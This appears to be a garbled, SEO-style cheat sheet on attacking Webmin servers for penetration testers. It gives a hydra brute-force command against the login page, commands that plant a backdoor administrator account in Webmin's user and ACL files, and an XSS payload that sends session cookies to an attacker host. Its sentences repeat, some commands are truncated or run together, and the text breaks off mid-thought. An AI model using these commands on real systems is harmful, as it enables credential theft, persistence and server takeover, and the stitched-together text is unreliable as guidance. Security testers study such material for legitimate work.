Webmin Hacktricks ^new^ Jun 2026

Webmin is a treasure trove for attackers—combining powerful system access with a web interface prone to historical RCE flaws. From default credentials to session hijacking and post-exploitation module abuse, mastering Webmin is a must for any penetration tester. Use these to assess, exploit, and pivot, but always ensure you have explicit permission before testing.

cat /etc/webmin/miniserv.users # Format: user:encrypted_pass

Using the module:

# Download vulnerable Webmin docker run -it -p 10000:10000 vulhub/webmin:1.920 webmin hacktricks

Less-privileged Webmin users can often access the File Manager, which, when poorly configured, allows reading /etc/shadow or writing unauthorized files, leading to full system takeover. 3. Webmin Security Testing: A "Hacktricks" Approach

echo "backdoor:\$1\$somehash:0" >> /etc/webmin/miniserv.users echo "backdoor:Backdoor User:acl" >> /etc/webmin/webmin.acl

hydra -l root -P /usr/share/wordlists/rockyou.txt https://target:10000 /session_login.cgi -m "page=1&user=^USER^&pass=^PASS^" -V -I cat /etc/webmin/miniserv

<img src=x onerror="fetch('/sysinfo.cgi?xss=<script>new Image().src='http://attacker:8080/?'+document.cookie</script>')">

Verify that Webmin Configuration > Trusted Referrers is enabled to prevent XSS/CSRF.

Webmin has a history of specific vulnerability types. Understanding these is key to securing the server. Webmin has a history of specific vulnerability types

update.cgi RCE via u' parameter injection. Requires authenticated user.

Once you have root (Webmin runs as root by default):